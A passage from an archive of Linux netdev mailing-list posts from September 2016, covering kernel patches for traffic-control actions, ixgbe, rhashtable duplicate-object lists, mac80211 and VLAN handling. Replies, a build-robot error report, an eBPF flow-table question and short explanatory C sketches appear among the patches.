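		if (demo_should_lose())
			lost++;
	return lost;
}
```

Single-threaded, this drops exactly one packet in eight. The "approximately" in the commit message comes from the missing locking: two CPUs can read the same counter value, so a drop may be duplicated or skipped.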

[PATCH net-next 1/1] net sched actions police: peg drop stats for conforming traffic

2016-09-18 Thread Jamal Hadi Salim

From: Roman Mashak 

Setting the conforming action to drop is a valid policy.
When it is set, we need to at least see the drop stats indicating it
for debugging.

Signed-off-by: Roman Mashak 
Signed-off-by: Jamal Hadi Salim 
---
 net/sched/act_police.c | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/net/sched/act_police.c b/net/sched/act_police.c
index 8a3be1d..ba7074b 100644
--- a/net/sched/act_police.c
+++ b/net/sched/act_police.c
@@ -249,6 +249,8 @@ static int tcf_act_police(struct sk_buff *skb, const struct 
tc_action *a,
police->tcfp_t_c = now;
police->tcfp_toks = toks;
police->tcfp_ptoks = ptoks;
+   if (police->tcfp_result == TC_ACT_SHOT)
+   police->tcf_qstats.drops++;
spin_unlock(&police->tcf_lock);
return police->tcfp_result;
}
-- 
1.9.1

Re: [PATCH] net: mvneta: mark symbols static where possible

2016-09-18 Thread Sergei Shtylyov


Hello.

On 9/18/2016 12:20 PM, Baoyou Xie wrote:


We get 2 warnings when building kernel with W=1:
drivers/net/ethernet/marvell/mvneta.c:639:27: warning: no previous prototype 
for 'mvneta_get_stats64' [-Wmissing-prototypes]
drivers/net/ethernet/marvell/mvneta.c:3529:5: warning: no previous prototype 
for 'mvneta_ethtool_set_link_ksettings' [-Wmissing-prototypes]

In fact, these functions are only used in the file in which they are
declared and don't need a declaration, but can be made static.
so this patch marks these functions with 'static'.

Signed-off-by: Baoyou Xie 
---
 drivers/net/ethernet/marvell/mvneta.c | 10 ++
 1 file changed, 6 insertions(+), 4 deletions(-)

diff --git a/drivers/net/ethernet/marvell/mvneta.c 
b/drivers/net/ethernet/marvell/mvneta.c
index 32f0cc4..03be592 100644
--- a/drivers/net/ethernet/marvell/mvneta.c
+++ b/drivers/net/ethernet/marvell/mvneta.c
@@ -636,8 +636,9 @@ static void mvneta_mib_counters_clear(struct mvneta_port 
*pp)
 }

 /* Get System Network Statistics */
-struct rtnl_link_stats64 *mvneta_get_stats64(struct net_device *dev,
-struct rtnl_link_stats64 *stats)
+static struct
+rtnl_link_stats64 *mvneta_get_stats64(struct net_device *dev,


   I'd break the line after * here, not where you did it. This way the
function type would remain all on one line.



+ struct rtnl_link_stats64 *stats)
 {
struct mvneta_port *pp = netdev_priv(dev);
unsigned int start;

[...]

MBR, Sergei

eBPF: how to check the flow table

2016-09-18 Thread Eric Leblond

Hello,

I'm currently testing code implementing AF_PACKET bypass for
Suricata. The idea is that Suricata updates a hash table containing
a list of flows it does not want to see anymore.

I want to check flow timeouts from userspace, so my current
algorithm is doing:

    while (bpf_get_next_key(mapfd, &key, &next_key) == 0) {
        bpf_lookup_elem(mapfd, &next_key, &value);
        FlowCallback(mapfd, &next_key, &value, data);
        key = next_key;
    }

In FlowCallback, I check the timing in the flow entry and I remove
the key if the flow has timed out.

This currently works well when there are only a few flows, but on a
real system with lots of insertions into the table, the loop never
returns because we dequeue slower than we enqueue.

Is there a better algorithm or another way to do it?

BR,
-- 
Eric Leblond 
Blog: https://home.regit.org/
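
To make the walk described above concrete, here is a small self-contained sketch of one expiry pass over a mock map. Everything in it is hypothetical: demo_map is a fixed in-memory array standing in for the eBPF hash map, demo_get_next_key() only imitates the "next key" style of iteration (a NULL key starts from the beginning), and nothing here calls the real bpf syscall wrappers.

```c
#include <stdbool.h>
#include <stddef.h>

#define DEMO_SLOTS 8

/* Hypothetical flow entry: the slot index is the key, last_seen the value. */
struct demo_flow {
	bool used;
	long last_seen;
};

struct demo_map {
	struct demo_flow slot[DEMO_SLOTS];
};

/* Mock of "get next key": a NULL key means start from the beginning. */
static int demo_get_next_key(const struct demo_map *m, const int *key,
			     int *next_key)
{
	int i = key ? *key + 1 : 0;

	for (; i < DEMO_SLOTS; i++) {
		if (m->slot[i].used) {
			*next_key = i;
			return 0;
		}
	}
	return -1;	/* no more keys */
}

/* One pass over the map: drop flows idle for longer than timeout. */
static int demo_expire_flows(struct demo_map *m, long now, long timeout)
{
	int key, next_key, removed = 0;
	const int *cur = NULL;

	while (demo_get_next_key(m, cur, &next_key) == 0) {
		if (now - m->slot[next_key].last_seen > timeout) {
			m->slot[next_key].used = false;
			removed++;
		}
		key = next_key;
		cur = &key;
	}
	return removed;
}
```

The pass terminates here only because nothing inserts into the mock map while it is being walked. It illustrates the shape of the loop, not a fix for the situation in the question, where entries are added concurrently faster than they are removed.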

[PATCH net-next 1/1] net sched: stylistic cleanups

2016-09-18 Thread Jamal Hadi Salim

From: Jamal Hadi Salim 

Signed-off-by: Jamal Hadi Salim 
---
 net/sched/act_api.c | 16 ++--
 net/sched/act_csum.c| 36 ++--
 net/sched/act_gact.c|  3 ++-
 net/sched/act_mirred.c  |  3 ++-
 net/sched/act_police.c  | 10 --
 net/sched/cls_api.c | 18 ++
 net/sched/cls_bpf.c |  6 --
 net/sched/cls_flow.c| 21 ++---
 net/sched/cls_flower.c  |  3 ++-
 net/sched/cls_fw.c  | 10 +-
 net/sched/cls_route.c   |  9 +++--
 net/sched/cls_tcindex.c | 12 ++--
 net/sched/cls_u32.c | 30 --
 net/sched/sch_api.c | 41 ++---
 14 files changed, 114 insertions(+), 104 deletions(-)

diff --git a/net/sched/act_api.c b/net/sched/act_api.c
index d09d068..d0aceb1 100644
--- a/net/sched/act_api.c
+++ b/net/sched/act_api.c
@@ -592,9 +592,8 @@ err_out:
return ERR_PTR(err);
 }
 
-int tcf_action_init(struct net *net, struct nlattr *nla,
- struct nlattr *est, char *name, int ovr,
- int bind, struct list_head *actions)
+int tcf_action_init(struct net *net, struct nlattr *nla, struct nlattr *est,
+   char *name, int ovr, int bind, struct list_head *actions)
 {
struct nlattr *tb[TCA_ACT_MAX_PRIO + 1];
struct tc_action *act;
@@ -923,9 +922,8 @@ tcf_add_notify(struct net *net, struct nlmsghdr *n, struct 
list_head *actions,
return err;
 }
 
-static int
-tcf_action_add(struct net *net, struct nlattr *nla, struct nlmsghdr *n,
-  u32 portid, int ovr)
+static int tcf_action_add(struct net *net, struct nlattr *nla,
+ struct nlmsghdr *n, u32 portid, int ovr)
 {
int ret = 0;
LIST_HEAD(actions);
@@ -988,8 +986,7 @@ replay:
return ret;
 }
 
-static struct nlattr *
-find_dump_kind(const struct nlmsghdr *n)
+static struct nlattr *find_dump_kind(const struct nlmsghdr *n)
 {
struct nlattr *tb1, *tb2[TCA_ACT_MAX + 1];
struct nlattr *tb[TCA_ACT_MAX_PRIO + 1];
@@ -1016,8 +1013,7 @@ find_dump_kind(const struct nlmsghdr *n)
return kind;
 }
 
-static int
-tc_dump_action(struct sk_buff *skb, struct netlink_callback *cb)
+static int tc_dump_action(struct sk_buff *skb, struct netlink_callback *cb)
 {
struct net *net = sock_net(skb->sk);
struct nlmsghdr *nlh;
diff --git a/net/sched/act_csum.c b/net/sched/act_csum.c
index b5dbf63..e0defce 100644
--- a/net/sched/act_csum.c
+++ b/net/sched/act_csum.c
@@ -116,8 +116,8 @@ static void *tcf_csum_skb_nextlayer(struct sk_buff *skb,
return (void *)(skb_network_header(skb) + ihl);
 }
 
-static int tcf_csum_ipv4_icmp(struct sk_buff *skb,
- unsigned int ihl, unsigned int ipl)
+static int tcf_csum_ipv4_icmp(struct sk_buff *skb, unsigned int ihl,
+ unsigned int ipl)
 {
struct icmphdr *icmph;
 
@@ -152,8 +152,8 @@ static int tcf_csum_ipv4_igmp(struct sk_buff *skb,
return 1;
 }
 
-static int tcf_csum_ipv6_icmp(struct sk_buff *skb,
- unsigned int ihl, unsigned int ipl)
+static int tcf_csum_ipv6_icmp(struct sk_buff *skb, unsigned int ihl,
+ unsigned int ipl)
 {
struct icmp6hdr *icmp6h;
const struct ipv6hdr *ip6h;
@@ -174,8 +174,8 @@ static int tcf_csum_ipv6_icmp(struct sk_buff *skb,
return 1;
 }
 
-static int tcf_csum_ipv4_tcp(struct sk_buff *skb,
-unsigned int ihl, unsigned int ipl)
+static int tcf_csum_ipv4_tcp(struct sk_buff *skb, unsigned int ihl,
+unsigned int ipl)
 {
struct tcphdr *tcph;
const struct iphdr *iph;
@@ -195,8 +195,8 @@ static int tcf_csum_ipv4_tcp(struct sk_buff *skb,
return 1;
 }
 
-static int tcf_csum_ipv6_tcp(struct sk_buff *skb,
-unsigned int ihl, unsigned int ipl)
+static int tcf_csum_ipv6_tcp(struct sk_buff *skb, unsigned int ihl,
+unsigned int ipl)
 {
struct tcphdr *tcph;
const struct ipv6hdr *ip6h;
@@ -217,8 +217,8 @@ static int tcf_csum_ipv6_tcp(struct sk_buff *skb,
return 1;
 }
 
-static int tcf_csum_ipv4_udp(struct sk_buff *skb,
-unsigned int ihl, unsigned int ipl, int udplite)
+static int tcf_csum_ipv4_udp(struct sk_buff *skb, unsigned int ihl,
+unsigned int ipl, int udplite)
 {
struct udphdr *udph;
const struct iphdr *iph;
@@ -270,8 +270,8 @@ ignore_obscure_skb:
return 1;
 }
 
-static int tcf_csum_ipv6_udp(struct sk_buff *skb,
-unsigned int ihl, unsigned int ipl, int udplite)
+static int tcf_csum_ipv6_udp(struct sk_buff *skb, unsigned int ihl,
+unsigned int ipl, int udplite)
 {
struct udphdr *udph;
const struct ipv6hdr *ip6h;

[PATCH 1/1] ixgbe: replace defined with IS_ENABLED

2016-09-18 Thread zyjzyj2000

From: Zhu Yanjun 

Replace the defined(CONFIG_FCOE) || defined(CONFIG_FCOE_MODULE) test
with IS_ENABLED(CONFIG_FCOE) in ixgbe.h.

Signed-off-by: Zhu Yanjun 
---
 drivers/net/ethernet/intel/ixgbe/ixgbe.h | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe.h 
b/drivers/net/ethernet/intel/ixgbe/ixgbe.h
index 9475ff9..f8bc1d0 100644
--- a/drivers/net/ethernet/intel/ixgbe/ixgbe.h
+++ b/drivers/net/ethernet/intel/ixgbe/ixgbe.h
@@ -45,7 +45,7 @@
 #include "ixgbe_type.h"
 #include "ixgbe_common.h"
 #include "ixgbe_dcb.h"
-#if defined(CONFIG_FCOE) || defined(CONFIG_FCOE_MODULE)
+#if IS_ENABLED(CONFIG_FCOE)
 #define IXGBE_FCOE
 #include "ixgbe_fcoe.h"
 #endif /* CONFIG_FCOE or CONFIG_FCOE_MODULE */
-- 
2.7.4
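
For anyone wondering why the two forms are equivalent, below is a standalone sketch of the preprocessor trick behind IS_ENABLED(). The DEMO_* and demo_* macros are simplified re-creations written for this example (the real ones live in include/linux/kconfig.h and differ in detail), and the CONFIG_DEMO_* options are made up.

```c
/* Simplified copies of the preprocessor trick used by IS_ENABLED(). */
#define DEMO_ARG_PLACEHOLDER_1 0,
#define demo_take_second(ignored, val, ...) val
#define demo_is_defined(x) demo_is_defined_(x)
#define demo_is_defined_(val) demo_is_defined__(DEMO_ARG_PLACEHOLDER_##val)
#define demo_is_defined__(arg1_or_junk) demo_take_second(arg1_or_junk 1, 0, 0)

/* True if the option is defined to 1 either built in or as a module. */
#define DEMO_IS_ENABLED(opt) \
	(demo_is_defined(opt) || demo_is_defined(opt##_MODULE))

/* Hypothetical options: one built as a module, one built in, one unset. */
#define CONFIG_DEMO_FCOE_MODULE 1
#define CONFIG_DEMO_DCB 1

/* The macro expands to a constant expression, so it works in #if too. */
#if DEMO_IS_ENABLED(CONFIG_DEMO_FCOE)
#define DEMO_HAVE_FCOE 1
#else
#define DEMO_HAVE_FCOE 0
#endif

static int demo_fcoe_enabled(void)
{
	return DEMO_HAVE_FCOE;
}

static int demo_dcb_enabled(void)
{
	return DEMO_IS_ENABLED(CONFIG_DEMO_DCB);
}

static int demo_unset_enabled(void)
{
	return DEMO_IS_ENABLED(CONFIG_DEMO_UNSET);
}
```

When an option is defined to 1, the pasted placeholder expands to "0," and shifts a 1 into the second argument slot; otherwise the junk token stays in the first slot and the second argument is 0. A module-only option is caught through the _MODULE suffix, which is what the old defined(...) || defined(..._MODULE) pair spelled out by hand.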

Re: [PATCH v2 net-next 2/2] net sched ife action: Introduce skb tcindex metadata encap decap

2016-09-18 Thread kbuild test robot

Hi Jamal,

[auto build test ERROR on net-next/master]

url:
https://github.com/0day-ci/linux/commits/Jamal-Hadi-Salim/net-sched-ife-action-add-16-bit-helpers/20160918-192521
config: i386-allmodconfig (attached as .config)
compiler: gcc-6 (Debian 6.2.0-3) 6.2.0 20160901
reproduce:
# save the attached .config to linux build tree
make ARCH=i386 

All errors (new ones prefixed by >>):

>> make[3]: *** No rule to make target 'net/sched/act_meta_skbtcindex.c', 
>> needed by 'net/sched/act_meta_skbtcindex.o'.
   make[3]: Target '__build' not remade because of errors.

---
0-DAY kernel test infrastructure                Open Source Technology Center
https://lists.01.org/pipermail/kbuild-all                   Intel Corporation



[PATCH 0/2] rhashtable: rhashtable with duplicate objects

2016-09-18 Thread Herbert Xu

On Fri, Aug 05, 2016 at 12:50:33PM +0200, Johannes Berg wrote:
> > My plan is to build support for this directly into rhashtable.
> > So I'm adding a struct rhlist_head that would be used in place
> > of rhash_head for these cases and it'll carry an extra pointer
> > for the list of identical entries.
> > 
> > I will then add an additional layer of insert/lookup interfaces
> > for rhlist_head.
> 
> Oh, ok.

OK, it's finally ready now.

This series contains two patches.  The first adds the rhlist
interface and the second converts mac80211 to use it.  If this works
out I'll then proceed to convert the other insecure_elasticity
users over to this.

I've tested the rhlist code with test_rhashtable but I haven't
tested the mac80211 conversion.  So please give it a go and see
if it still works.

Thanks!
-- 
Email: Herbert Xu 
Home Page: http://gondor.apana.org.au/~herbert/
PGP Key: http://gondor.apana.org.au/~herbert/pubkey.txt

[PATCH 1/2] rhashtable: Add rhlist interface

2016-09-18 Thread Herbert Xu

The insecure_elasticity setting is an ugly wart brought out by
users who need to insert duplicate objects (that is, distinct
objects with identical keys) into the same table.

In fact, those users have a much bigger problem.  Once those
duplicate objects are inserted, they don't have an interface to
find them (unless you count the walker interface which walks
over the entire table).

Some users have resorted to doing a manual walk over the hash
table which is of course broken because they don't handle the
potential existence of multiple hash tables.  The result is that
they will break sporadically when they encounter a hash table
resize/rehash.

This patch provides a way out for those users, at the expense
of an extra pointer per object.  Essentially each object is now
a list of objects carrying the same key.  The hash table will
only see the lists so nothing changes as far as rhashtable is
concerned.

To use this new interface, you need to insert a struct rhlist_head
into your objects instead of struct rhash_head.  While the hash
table is unchanged, for type-safety you'll need to use struct
rhltable instead of struct rhashtable.  All the existing interfaces
have been duplicated for rhlist, including the hash table walker.

One missing feature is nulls marking because AFAIK the only potential
user of it does not need duplicate objects.  Should anyone need
this it shouldn't be too hard to add.

Signed-off-by: Herbert Xu 
---
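
A rough single-threaded sketch of the idea in the description above, for readers who want to see the shape of the data structure before reading the diff. All demo_* names are hypothetical; there is no RCU, resizing or locking here, the bucket count is fixed, and placing a new duplicate right after the first object is an arbitrary choice for this sketch rather than a statement about what the patch does.

```c
#include <stddef.h>

#define DEMO_BUCKETS 4

struct demo_hash_head {
	struct demo_hash_head *next;	/* next distinct key in the bucket */
};

/* Mirrors the shape of struct rhlist_head: chain link plus duplicate link. */
struct demo_list_head {
	struct demo_hash_head rhead;
	struct demo_list_head *next;	/* next object with the same key */
};

struct demo_obj {
	int key;
	int val;
	struct demo_list_head node;
};

struct demo_table {
	struct demo_hash_head *bucket[DEMO_BUCKETS];
};

static struct demo_obj *demo_obj_of(struct demo_hash_head *h)
{
	/* rhead is the first member of node, so offsetof(node) suffices. */
	return (struct demo_obj *)((char *)h - offsetof(struct demo_obj, node));
}

/* Return the first object stored under key, or NULL. */
static struct demo_obj *demo_lookup(struct demo_table *t, int key)
{
	struct demo_hash_head *h;

	for (h = t->bucket[(unsigned int)key % DEMO_BUCKETS]; h; h = h->next)
		if (demo_obj_of(h)->key == key)
			return demo_obj_of(h);
	return NULL;
}

/* Insert obj; a duplicate key goes onto the existing object's list. */
static void demo_insert(struct demo_table *t, struct demo_obj *obj)
{
	struct demo_hash_head **b;
	struct demo_obj *first = demo_lookup(t, obj->key);

	obj->node.rhead.next = NULL;
	if (first) {
		obj->node.next = first->node.next;
		first->node.next = &obj->node;
		return;
	}
	b = &t->bucket[(unsigned int)obj->key % DEMO_BUCKETS];
	obj->node.next = NULL;
	obj->node.rhead.next = *b;
	*b = &obj->node.rhead;
}

/* Count the objects sharing key by walking the duplicate list. */
static int demo_count(struct demo_table *t, int key)
{
	struct demo_obj *first = demo_lookup(t, key);
	struct demo_list_head *n;
	int count = 0;

	for (n = first ? &first->node : NULL; n; n = n->next)
		count++;
	return count;
}
```

The bucket chain only ever links one entry per key, so the table itself never sees duplicates; a lookup returns the first object and the caller follows the per-key list from there, at the cost of one extra pointer per object.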

 include/linux/rhashtable.h |  490 ++---
 lib/rhashtable.c   |  231 -
 2 files changed, 560 insertions(+), 161 deletions(-)

diff --git a/include/linux/rhashtable.h b/include/linux/rhashtable.h
index fd82584..dc7bea6 100644
--- a/include/linux/rhashtable.h
+++ b/include/linux/rhashtable.h
@@ -1,7 +1,7 @@
 /*
  * Resizable, Scalable, Concurrent Hash Table
  *
- * Copyright (c) 2015 Herbert Xu 
+ * Copyright (c) 2015-2016 Herbert Xu 
  * Copyright (c) 2014-2015 Thomas Graf 
  * Copyright (c) 2008-2014 Patrick McHardy 
  *
@@ -53,6 +53,11 @@ struct rhash_head {
struct rhash_head __rcu *next;
 };
 
+struct rhlist_head {
+   struct rhash_head   rhead;
+   struct rhlist_head __rcu*next;
+};
+
 /**
  * struct bucket_table - Table of hash buckets
  * @size: Number of hash buckets
@@ -137,6 +142,7 @@ struct rhashtable_params {
  * @key_len: Key length for hashfn
  * @elasticity: Maximum chain length before rehash
  * @p: Configuration parameters
+ * @rhlist: True if this is an rhltable
  * @run_work: Deferred worker to expand/shrink asynchronously
  * @mutex: Mutex to protect current/future table swapping
  * @lock: Spin lock to protect walker list
@@ -147,12 +153,21 @@ struct rhashtable {
unsigned intkey_len;
unsigned intelasticity;
struct rhashtable_paramsp;
+   boolrhlist;
struct work_struct  run_work;
struct mutexmutex;
spinlock_t  lock;
 };
 
 /**
+ * struct rhltable - Hash table with duplicate objects in a list
+ * @ht: Underlying rhtable
+ */
+struct rhltable {
+   struct rhashtable ht;
+};
+
+/**
  * struct rhashtable_walker - Hash table walker
  * @list: List entry on list of walkers
  * @tbl: The table that we were walking over
@@ -163,9 +178,10 @@ struct rhashtable_walker {
 };
 
 /**
- * struct rhashtable_iter - Hash table iterator, fits into netlink cb
+ * struct rhashtable_iter - Hash table iterator
  * @ht: Table to iterate through
  * @p: Current pointer
+ * @list: Current hash list pointer
  * @walker: Associated rhashtable walker
  * @slot: Current slot
  * @skip: Number of entries to skip in slot
@@ -173,6 +189,7 @@ struct rhashtable_walker {
 struct rhashtable_iter {
struct rhashtable *ht;
struct rhash_head *p;
+   struct rhlist_head *list;
struct rhashtable_walker walker;
unsigned int slot;
unsigned int skip;
@@ -339,13 +356,11 @@ static inline int lockdep_rht_bucket_is_held(const struct bucket_table *tbl,
 
 int rhashtable_init(struct rhashtable *ht,
const struct rhashtable_params *params);
+int rhltable_init(struct rhltable *hlt,
+ const struct rhashtable_params *params);
 
-struct bucket_table *rhashtable_insert_slow(struct rhashtable *ht,
-   const void *key,
-   struct rhash_head *obj,
-   struct bucket_table *old_tbl,
-   void **data);
-int rhashtable_insert_rehash(struct rhashtable *ht, struct bucket_table *tbl);
+void *rhashtable_insert_slow(struct rhashtable *ht, const void *key,
+struct rhash_head *obj);
 
 void rhashtable_walk_enter(struct rhashtable *ht,
   struct rhashtable_iter *ite

[PATCH 2/2] mac80211: Use rhltable instead of rhashtable

2016-09-18 Thread Herbert Xu

mac80211 currently uses rhashtable with insecure_elasticity set
to true.  The latter is because of duplicate objects.  What's
more, mac80211 walks the rhashtable chains by hand which is broken
as rhashtable may contain multiple tables due to resizing or
rehashing.

This patch fixes it by converting it to the newly added rhltable
interface which is designed for use with duplicate objects.

With rhltable a lookup returns a list of objects instead of a
single one.  This is then fed into the existing for_each_sta_info
macro.

This patch also deletes the sta_addr_hash function since rhashtable
defaults to jhash.
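
The lookup-then-iterate pattern described above can be sketched as follows. This is a simplified userspace illustration only: toy_sta, toy_for_each_sta and the ifindex field (standing in for sta->sdata) are hypothetical names, and the real for_each_sta_info macro additionally deals with RCU.

```c
#include <assert.h>
#include <stddef.h>

/* Toy station entry; several entries may share one MAC address. */
struct toy_sta {
	int ifindex;              /* stands in for sta->sdata */
	struct toy_sta *dup_next; /* next station with the same address */
};

/* Walk every entry on the list returned by a lookup. */
#define toy_for_each_sta(pos, head) \
	for ((pos) = (head); (pos); (pos) = (pos)->dup_next)

/* Pick the entry that belongs to the given interface, if any. */
static struct toy_sta *toy_sta_get(struct toy_sta *head, int ifindex)
{
	struct toy_sta *sta;

	toy_for_each_sta(sta, head)
		if (sta->ifindex == ifindex)
			return sta;
	return NULL;
}
```

The caller no longer needs a bucket_table pointer: the list head returned by the lookup is the only state the iteration depends on.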

Signed-off-by: Herbert Xu 
---

 net/mac80211/ieee80211_i.h |2 -
 net/mac80211/rx.c  |7 +-
 net/mac80211/sta_info.c|   52 ++---
 net/mac80211/sta_info.h|   19 ++--
 net/mac80211/status.c  |7 +-
 5 files changed, 33 insertions(+), 54 deletions(-)

diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
index f56d342..1a52cd4 100644
--- a/net/mac80211/ieee80211_i.h
+++ b/net/mac80211/ieee80211_i.h
@@ -1208,7 +1208,7 @@ struct ieee80211_local {
spinlock_t tim_lock;
unsigned long num_sta;
struct list_head sta_list;
-   struct rhashtable sta_hash;
+   struct rhltable sta_hash;
struct timer_list sta_cleanup;
int sta_generation;
 
diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c
index 9dce3b1..5e26dc6 100644
--- a/net/mac80211/rx.c
+++ b/net/mac80211/rx.c
@@ -3940,7 +3940,7 @@ static void __ieee80211_rx_handle_packet(struct ieee80211_hw *hw,
__le16 fc;
struct ieee80211_rx_data rx;
struct ieee80211_sub_if_data *prev;
-   struct rhash_head *tmp;
+   struct rhlist_head *tmp;
int err = 0;
 
fc = ((struct ieee80211_hdr *)skb->data)->frame_control;
@@ -3983,13 +3983,10 @@ static void __ieee80211_rx_handle_packet(struct ieee80211_hw *hw,
goto out;
} else if (ieee80211_is_data(fc)) {
struct sta_info *sta, *prev_sta;
-   const struct bucket_table *tbl;
 
prev_sta = NULL;
 
-   tbl = rht_dereference_rcu(local->sta_hash.tbl, &local->sta_hash);
-
-   for_each_sta_info(local, tbl, hdr->addr2, sta, tmp) {
+   for_each_sta_info(local, hdr->addr2, sta, tmp) {
if (!prev_sta) {
prev_sta = sta;
continue;
diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
index 19f14c9..198d0bd 100644
--- a/net/mac80211/sta_info.c
+++ b/net/mac80211/sta_info.c
@@ -67,12 +67,10 @@
 
 static const struct rhashtable_params sta_rht_params = {
.nelem_hint = 3, /* start small */
-   .insecure_elasticity = true, /* Disable chain-length checks. */
.automatic_shrinking = true,
.head_offset = offsetof(struct sta_info, hash_node),
.key_offset = offsetof(struct sta_info, addr),
.key_len = ETH_ALEN,
-   .hashfn = sta_addr_hash,
.max_size = CONFIG_MAC80211_STA_HASH_MAX_SIZE,
 };
 
@@ -80,8 +78,8 @@ static const struct rhashtable_params sta_rht_params = {
 static int sta_info_hash_del(struct ieee80211_local *local,
 struct sta_info *sta)
 {
-   return rhashtable_remove_fast(&local->sta_hash, &sta->hash_node,
- sta_rht_params);
+   return rhltable_remove(&local->sta_hash, &sta->hash_node,
+  sta_rht_params);
 }
 
 static void __cleanup_single_sta(struct sta_info *sta)
@@ -157,19 +155,22 @@ static void cleanup_single_sta(struct sta_info *sta)
sta_info_free(local, sta);
 }
 
+struct rhlist_head *sta_info_hash_lookup(struct ieee80211_local *local,
+const u8 *addr)
+{
+   return rhltable_lookup(&local->sta_hash, addr, sta_rht_params);
+}
+
 /* protected by RCU */
 struct sta_info *sta_info_get(struct ieee80211_sub_if_data *sdata,
  const u8 *addr)
 {
struct ieee80211_local *local = sdata->local;
+   struct rhlist_head *tmp;
struct sta_info *sta;
-   struct rhash_head *tmp;
-   const struct bucket_table *tbl;
 
rcu_read_lock();
-   tbl = rht_dereference_rcu(local->sta_hash.tbl, &local->sta_hash);
-
-   for_each_sta_info(local, tbl, addr, sta, tmp) {
+   for_each_sta_info(local, addr, sta, tmp) {
if (sta->sdata == sdata) {
rcu_read_unlock();
/* this is safe as the caller must already hold
@@ -190,14 +191,11 @@ struct sta_info *sta_info_get_bss(struct ieee80211_sub_if_data *sdata,
  const u8 *addr)
 {
struct ieee80211_local *local = sdata->local;
+   struct rhlist_head *tmp;
struct sta_info *sta;
-   struct rhash_head *tmp;
-   const struct bucket_table *tbl;

Re: [PATCH v2 net-next 2/2] net sched ife action: Introduce skb tcindex metadata encap decap

2016-09-18 Thread Jamal Hadi Salim


On 16-09-18 09:45 AM, kbuild test robot wrote:

Hi Jamal,

[auto build test ERROR on net-next/master]


Hi monsieur/madame Bot,

fixed in v3.

cheers,
jamal

Re: [PATCH 2/2] iw_cxgb4: add fast-path for small REG_MR operations

2016-09-18 Thread Leon Romanovsky

On Fri, Sep 16, 2016 at 07:54:52AM -0700, Steve Wise wrote:
> When processing a REG_MR work request, if fw supports the
> FW_RI_NSMR_TPTE_WR work request, and if the page list for this
> registration is <= 2 pages, and the current state of the mr is INVALID,
> then use FW_RI_NSMR_TPTE_WR to pass down a fully populated TPTE for FW
> to write.  This avoids FW having to do an async read of the TPTE blocking
> the SQ until the read completes.
>
> To know if the current MR state is INVALID or not, iw_cxgb4 must track the
> state of each fastreg MR.  The c4iw_mr struct state is updated as REG_MR
> and LOCAL_INV WRs are posted and completed, when a reg_mr is destroyed,
> and when RECV completions are processed that include a local invalidation.
>
> This optimization increases small IO IOPS for both iSER and NVMF.
>
> Signed-off-by: Steve Wise 
> ---

<...>

> +   struct ib_reg_wr *wr, struct c4iw_mr *mhp,
> +   u8 *len16)
> +{
> + __be64 *p = (__be64 *)fr->pbl;
> +
> + fr->r2 = cpu_to_be32(0);

Is there any difference between the line above and "fr->r2 = 0"?
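
As a quick userspace check of the question above: zero has the same byte pattern in either byte order, so converting it changes nothing. The sketch below uses htonl() as a stand-in for cpu_to_be32(); to_be32 and zero_is_endian_neutral are names made up for the example.

```c
#include <arpa/inet.h>
#include <assert.h>
#include <stdint.h>

/* Userspace stand-in for cpu_to_be32(): htonl() converts a 32-bit
 * value from host byte order to big-endian (network) byte order. */
static uint32_t to_be32(uint32_t v)
{
	return htonl(v);
}

/* Store zero both ways and report whether the stored values match. */
static int zero_is_endian_neutral(void)
{
	uint32_t converted = to_be32(0);
	uint32_t plain = 0;

	return converted == plain;
}
```

The same holds for any value whose bytes read the same in both directions, such as 0xffffffff, on little-endian and big-endian hosts alike.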



[PATCH net-next 1/2] net: skbuff: Export __skb_vlan_pop

2016-09-18 Thread Shmulik Ladkani

This exports the functionality of extracting the tag from the payload,
without moving the next vlan tag into the hwaccel tag.

Signed-off-by: Shmulik Ladkani 
---
 include/linux/skbuff.h | 1 +
 net/core/skbuff.c  | 7 +--
 2 files changed, 6 insertions(+), 2 deletions(-)

diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
index 4c5662f05b..000c5301b8 100644
--- a/include/linux/skbuff.h
+++ b/include/linux/skbuff.h
@@ -3075,6 +3075,7 @@ bool skb_gso_validate_mtu(const struct sk_buff *skb, unsigned int mtu);
 struct sk_buff *skb_segment(struct sk_buff *skb, netdev_features_t features);
 struct sk_buff *skb_vlan_untag(struct sk_buff *skb);
 int skb_ensure_writable(struct sk_buff *skb, int write_len);
+int __skb_vlan_pop(struct sk_buff *skb, u16 *vlan_tci);
 int skb_vlan_pop(struct sk_buff *skb);
 int skb_vlan_push(struct sk_buff *skb, __be16 vlan_proto, u16 vlan_tci);
 struct sk_buff *pskb_extract(struct sk_buff *skb, int off, int to_copy,
diff --git a/net/core/skbuff.c b/net/core/skbuff.c
index cc2c004838..2937088844 100644
--- a/net/core/skbuff.c
+++ b/net/core/skbuff.c
@@ -4493,8 +4493,10 @@ int skb_ensure_writable(struct sk_buff *skb, int write_len)
 }
 EXPORT_SYMBOL(skb_ensure_writable);
 
-/* remove VLAN header from packet and update csum accordingly. */
-static int __skb_vlan_pop(struct sk_buff *skb, u16 *vlan_tci)
+/* remove VLAN header from packet and update csum accordingly.
+ * expects a non skb_vlan_tag_present skb with a vlan tag payload
+ */
+int __skb_vlan_pop(struct sk_buff *skb, u16 *vlan_tci)
 {
struct vlan_hdr *vhdr;
unsigned int offset = skb->data - skb_mac_header(skb);
@@ -4525,6 +4527,7 @@ pull:
 
return err;
 }
+EXPORT_SYMBOL(__skb_vlan_pop);
 
 int skb_vlan_pop(struct sk_buff *skb)
 {
-- 
2.7.4

[PATCH net-next 2/2] net/sched: act_vlan: Introduce TCA_VLAN_ACT_MODIFY vlan action

2016-09-18 Thread Shmulik Ladkani

TCA_VLAN_ACT_MODIFY allows one to change an existing tag.

It accepts the same attributes as TCA_VLAN_ACT_PUSH (protocol, id,
priority).
If the packet is vlan tagged, the tag gets overwritten according to
the user-specified attributes.

For example, this allows the user to replace a tag's vid while preserving
its priority bits (as opposed to "action vlan pop pipe action vlan push").
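
The bit manipulation behind "replace the vid while preserving the priority bits" can be sketched in plain C. The TCI_* constants below mirror the 802.1Q TCI layout (3 priority bits, 1 DEI/CFI bit, 12 VLAN ID bits); tci_modify is a hypothetical helper written for this illustration and, like the patch, it treats a priority of 0 as "not specified".

```c
#include <assert.h>
#include <stdint.h>

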